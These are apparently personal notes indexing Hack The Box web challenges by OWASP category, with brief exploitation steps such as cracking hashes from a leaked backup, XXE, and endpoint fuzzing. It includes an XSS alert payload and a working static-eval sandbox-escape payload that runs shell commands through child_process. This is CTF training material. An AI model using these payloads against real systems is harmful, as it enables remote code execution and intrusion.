Skip to content

Back

OWASP Top 10

Index

looking_glass

[!bug] Command Injection

sanitize

[!bug] SQL Injection

baby_auth

[!bug] Broken Authentication

baby_nginxatsu

[!bug] Sensitive data exposure

  • leads to leakage of MD5 hashed admin password
  1. navigate to /storage
  2. download and unzip backup file
  3. browse via sqlite3 or sqlitebrowser
  4. crack hashes on crackstation or john

@todo - crack hashes with john and hashcat

baby_WAFfles_order

[!bug] XXE

  • change Content-Type to application/xml
  • convert json request body to xml
  • find payloads -> get /flag

baby_todo_or_not_todo

[!bug] Application logic bug leads to leakage of sensitive info

  • or use ffuf to fuzz api endpoints (include ?secret= and -H "Cookie: <cookie>")
  • in html body we found - "// don't use getstatus('all') until we get the verify_integrity() patched"
  • url contain ?secret=<secret>

  • requesting /api/list/all with our secret we find our flag

  • rewritten htb solver

baby_BoneChewerCon

full_stack_conf

[!bug] XSS

  • From description: "But be very careful with the stay up to date form, we don't sanitize anything and the admin logs in and checks the emails regularly, don't try anything funny!! 😅"
  • From site: "But be very careful with the stay up to date form, we don't sanitize anything and the admin logs in and checks the emails regularly, don't try anything funny!! 😅"

[!hint] XSS Payload: <script>alert("XSS")</script>

baby_website_rick

[!bug] Insecure Deserialization - RCE

baby_breaking_grad

[!bug] Code Execution Vulnerability - Prototype Pollution RCE

  • exploiting the static-eval library
  • sandbox bypass

Whitebox approach

[!hint] Payload from braincoke write up

{
    "name": "smth",
    "formula": "(function myTag(y){return ''[!y?'__proto__':'constructor'][y]})('constructor')('throw new Error(global.process.mainModule.constructor._load(\"child_process\").execSync(\"cat flag\"))')()"
}

or use htb solver